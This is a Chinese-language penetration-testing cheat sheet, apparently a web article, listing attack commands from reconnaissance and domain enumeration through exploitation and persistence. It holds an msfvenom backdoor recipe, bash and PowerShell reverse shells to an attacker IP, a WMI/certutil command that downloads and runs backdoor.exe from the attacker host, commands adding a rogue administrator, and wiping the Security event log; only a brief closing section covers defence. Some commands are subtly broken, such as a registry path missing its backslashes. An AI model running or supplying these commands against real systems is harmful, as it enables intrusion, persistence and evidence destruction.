网络安全攻防实战CMD命令全解析与高效脚本工具应用指南
发布日期:2025-04-07 04:22:19 点击次数:105

一、基础信息收集与网络探测
1. 主机存活探测
Nmap扫描:
`nmap -sP 网段`:通过ICMP Ping扫描存活主机,快速定位活跃设备。
`nmap -PR 网段`:使用ARP协议扫描内网主机,适用于防火墙禁Ping的场景。
Ping与Tracert:
`ping 192.168.1.1`:测试目标主机的连通性和延迟,支持`-t`持续探测。
`tracert www.google.com`:追踪数据包路径,排查网络延迟或路由异常。
2. 网络配置与连接状态
`ipconfig /all`:查看本机IP、子网掩码、网关及DNS信息,常用于内网拓扑分析。
`netstat -ano`:显示所有端口监听状态及关联进程PID,识别异常连接(如后门端口)。
`arp -a`:查看ARP缓存表,排查IP冲突或中间人攻击痕迹。
3. 域环境信息收集
`net user /domain`:枚举域用户列表,辅助社工或横向渗透。
`net group "Domain Admins" /domain`:获取域管理员组信息,定位高价值目标。
`nltest /domain_trusts`:查询域信任关系,规划跨域攻击路径。
二、渗透攻击与漏洞利用
1. 漏洞扫描与利用
Nmap脚本引擎:
`nmap --script smb-vuln-ms17-010 目标IP`:检测永恒之蓝漏洞(CVE-2017-0144)。
Hydra爆破工具:
`hydra -L users.txt -P pass.txt ssh://目标IP`:爆破SSH服务,支持SMB、RDP等协议。
2. Payload生成与反弹Shell
MSFvenom生成木马:
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > backdoor.exe`:生成Windows反向连接木马。
反弹Shell命令:
`bash -i >& /dev/tcp/攻击机IP/端口 0>&1`:Linux系统反弹Shell至攻击机。
`powershell -c "$client = New-Object System.Net.Sockets.TCPClient('攻击机IP',端口);$stream = $client.GetStream;[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush};$client.Close"`:PowerShell无文件反弹Shell。
3. Meterpreter后渗透操作
`sessions -u 会话ID`:将普通Shell升级为Meterpreter会话。
`shell`:进入系统原生Shell,执行本地命令(如添加用户、提权)。
`chcp 65001`:解决Windows Shell中文乱码问题。
三、后渗透与权限维持
1. Windows系统操作
用户与权限管理:
`net user hacker Password123! /add`:添加用户并加入管理员组:`net localgroup administrators hacker /add`。
远程桌面配置:
`REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`:开启RDP服务。
2. 痕迹清理与日志管理
`wevtutil cl Security`:清除安全事件日志(需管理员权限)。
`cleanmgr /sagerun:65535`:使用磁盘清理工具删除临时文件及系统缓存。
3. 内网横向移动
`wmic /node:目标IP /user:domainuser /password:pass process call create "cmd.exe /c certutil -urlcache -split -f http://攻击机IP/backdoor.exe C:backdoor.exe"`:通过WMI远程下载并执行恶意文件。
`psexec.exe 目标IP -u user -p pass -s cmd.exe`:使用PsExec工具远程执行命令。
四、高效脚本工具与自动化框架
1. 信息收集自动化
OneForAll:子域名枚举工具,集成DNS爆破、证书透明日志等多种数据源。
ARL灯塔系统:资产侦察与威胁监控,支持API集成和可视化分析。
2. 漏洞利用框架
Metasploit:
`use exploit/multi/handler`:配置监听模块,与生成的Payload配合获取会话。
Pocsuite3:开源漏洞验证框架,支持自定义PoC和批量扫描。
3. 内网渗透工具
Cobalt Strike:团队协作渗透平台,支持Beacon通信、横向移动和权限维持。
Impacket工具集:提供SMB、Kerberos协议攻击脚本(如ntlmrelayx.py)。
五、防御建议与安全加固
1. 命令监控与拦截:通过EDR/SIEM系统监控敏感命令(如`net user`、`reg add`)。
2. 最小权限原则:限制用户权限,禁用默认共享(如`net share C$ /delete`)。
3. 定期漏洞扫描:使用Nessus或OpenVAS检测系统漏洞,及时修补。
引用与扩展工具:
完整命令手册参考:
自动化工具集合:
防御策略与日志分析:
通过结合CMD命令与自动化工具,攻防双方可显著提升效率。建议在实际环境中严格测试命令兼容性,并遵守法律法规。